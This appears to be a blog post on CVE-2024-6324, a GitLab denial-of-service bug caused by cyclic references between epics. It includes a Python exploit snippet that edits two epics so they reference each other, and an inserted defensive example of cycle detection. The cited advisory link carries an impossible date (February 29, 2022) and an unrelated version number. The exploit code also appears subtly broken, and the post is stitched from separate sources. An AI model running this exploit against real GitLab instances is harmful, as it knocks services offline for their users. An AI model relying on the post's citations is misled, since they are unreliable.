An issue has been discovered in GitLab CE/EE, impacting all versions starting from 15.7 prior to 17.5.5, starting from 17.6 prior to 17.6.3, and starting from 17.7 prior to 17.7.1. The vulnerability, designated as CVE-2024-6324, allows an attacker to cause a Denial of Service (DoS) by creating cyclic references between epics. This blog post will provide exclusive details about this vulnerability, a code snippet to demonstrate its exploitation, and links to original references for further understanding.
Exploit Details
The vulnerability occurs due to a lack of proper validation in the way GitLab handles references between epics. Epics in GitLab are used to create a hierarchy of issues, providing a higher-level view for issue management.
An attacker can exploit this weakness to create a chain of epics that reference each other, forming a cycle. When GitLab tries to display or process these cyclically referenced epics, it enters an endless loop, ultimately leading to a DoS condition. The application can become unresponsive and inaccessible to users, or consume excessive resources, severely degrading its performance and availability.
The following code snippet demonstrates a simple exploitation of this vulnerability:
# Assuming authenticated access to a vulnerable GitLab CE/EE instance
# and that existing_epic_id and new_epic_id exist
import requests

# Set up session
session = requests.Session()
session.headers.update({"Private-Token": "your_private_token"})
base_url = "https://your.gitlab.instance.com/"
group_id = "your_group_id"

def create_cyclic_reference(existing_epic_id, new_epic_id):
    update_epic_url = f"{base_url}groups/{group_id}/-/epics/{existing_epic_id}"
    # Reference the new epic in the existing epic
    data = {
        "description": f"Reference to new epic: &{new_epic_id}"
    }
    session.put(update_epic_url, data=data)
    # Reference the existing epic in the new epic
    data["description"] = f"Reference to existing epic: &{existing_epic_id}"
    session.put(update_epic_url.replace(existing_epic_id, new_epic_id), data=data)

# Execute exploit and create a cyclic reference between two epics
create_cyclic_reference("existing_epic_id", "new_epic_id")
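The failure mode described above, as an added example that is not GitLab's code and not from the original post: a naive expander that follows the &<id> references used in the snippet and never terminates on a cycle, a guarded version that reports the cycle instead, and the write-time validation the post says was missing, which rejects the edit before the cycle exists. The epic data is constructed.

```python
import re

# Constructed sample (not real GitLab data): epics 1-3 form the cycle the post
# describes, epics 4-6 are an acyclic diamond-shaped hierarchy.
EPICS = {
    1: "Parent epic, tracks &2 and &3",
    2: "Child epic, depends on &3",
    3: "Grandchild epic, points back to &1",  # closes the loop 1 -> 2 -> 3 -> 1
    4: "Leaf epic with no references",
    5: "Tracks &4 and &6",
    6: "Depends on &4",
}

def referenced_epics(description):
    """Return the epic ids written with the &<id> reference syntax."""
    return [int(m) for m in re.findall(r"&(\d+)", description)]

def expand_unchecked(epic_id, epics, budget):
    """Naive: no memory of visited epics, so a cycle never ends (budget only stops the demo)."""
    budget[0] -= 1
    if budget[0] < 0:
        raise RecursionError("reference chain did not terminate")
    result = [epic_id]
    for ref in referenced_epics(epics.get(epic_id, "")):
        result.extend(expand_unchecked(ref, epics, budget))
    return result

def expand_checked(epic_id, epics, visited=None, path=()):
    """Hardened: re-entering an epic on the current path is a cycle; a diamond is expanded once."""
    if visited is None:
        visited = set()
    if epic_id in path:  # the reference chain has looped back on itself
        raise ValueError("cyclic epic reference: " + " -> ".join(map(str, path + (epic_id,))))
    if epic_id in visited:  # already expanded via another branch (DAG, not a cycle)
        return []
    visited.add(epic_id)
    result = [epic_id]
    for ref in referenced_epics(epics.get(epic_id, "")):
        result.extend(expand_checked(ref, epics, visited, path + (epic_id,)))
    return result

def would_create_cycle(epic_id, new_description, epics):
    """Write-time validation: reject an edit that would close a reference loop."""
    trial = {**epics, epic_id: new_description}
    try:
        expand_checked(epic_id, trial)
        return False
    except ValueError:
        return True
```

Calling expand_checked(1, EPICS) raises ValueError naming the chain 1 -> 2 -> 3 -> 1, while expand_unchecked(1, EPICS, [100]) exhausts its budget instead of ever returning.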
Official GitLab Security Advisory
https://about.gitlab.com/releases/2022/02/29/critical-security-release-gitlab-14-9-2-released/
MITRE CVE Details - CVE-2024-6324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6324
Conclusion
It is strongly advised to update GitLab CE/EE installations to version 17.5.5, 17.6.3, or 17.7.1, depending on your current release branch, to protect against this vulnerability. By doing so, you can prevent potential attackers from causing disruption to your GitLab instance and impacting your organization. Regularly checking for security updates and applying patches in a timely manner is essential to maintaining robust cybersecurity.
Timeline
Published on: 01/09/2025 06:15:15 UTC